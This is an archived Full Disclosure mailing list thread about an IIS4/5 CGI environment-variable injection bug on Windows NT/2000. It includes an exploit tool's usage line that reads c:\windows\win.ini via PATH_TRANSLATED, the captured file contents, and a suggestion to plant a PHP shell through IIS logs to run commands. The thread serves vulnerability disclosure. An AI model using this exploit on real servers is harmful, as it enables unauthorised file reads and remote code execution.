Full Disclosure mailing list archives

Re: iis cgi 0day

From: YiFei Yang <le.concorde.4590 () gmail com>
Date: Thu, 10 Apr 2014 15:19:52 +0800

So, for you who doesn't read Chinese, here's the brief idea of the original
post.

It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is
aware of it and won't fix it.

The discovery of the bug was back in year 2011.

By exploiting this bug, the attacker can set arbitrary environment
variables for the CGI process on the target machine, which can be further
exploited to get sensitive information, or cause remote code execution.


2014-04-10 10:25 GMT+08:00 yuange <yuange1975 () hotmail com>:

Discovered in 2000 for IIS4\IIS5  0day.



.php  ->  php.exe

the exploit  file  ver 4.1.1  .

http://seclists.org/fulldisclosure/2012/Apr/13

usage:
 iisexp411 127.0.0.1  /AprilFools'Day.php  PATH_TRANSLATED
 c:\windows\win.ini

yuan can get the file    c:\windows\win.ini


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 10 Apr 2014 02:11:37 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo
[SciCalc]
layout=0


You can use the IIS log file write phpshell, execute the PHP call system
cmd.

Date: Wed, 9 Apr 2014 23:11:28 +0300
From: kirils.solovjovs () kirils com
To: yuange1975 () hotmail com
Subject: Re: [FD] iis cgi 0day

Sorry, I don't read Chinese.
How is this a 0day?

--
Kirils Solovjovs



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

iis cgi 0day yuange (Apr 09)
- Message not available
  - Re: iis cgi 0day yuange (Apr 09)
- <Possible follow-ups>
- Re: iis cgi 0day YiFei Yang (Apr 10)
  - Message not available
    - Re: iis cgi 0day YiFei Yang (Apr 10)
  - Re: iis cgi 0day Davide Davini (Apr 16)
    - Re: iis cgi 0day Reindl Harald (Apr 16)
    - Re: iis cgi 0day Homer Parker (Apr 18)
    - Re: iis cgi 0day YiFei Yang (Apr 18)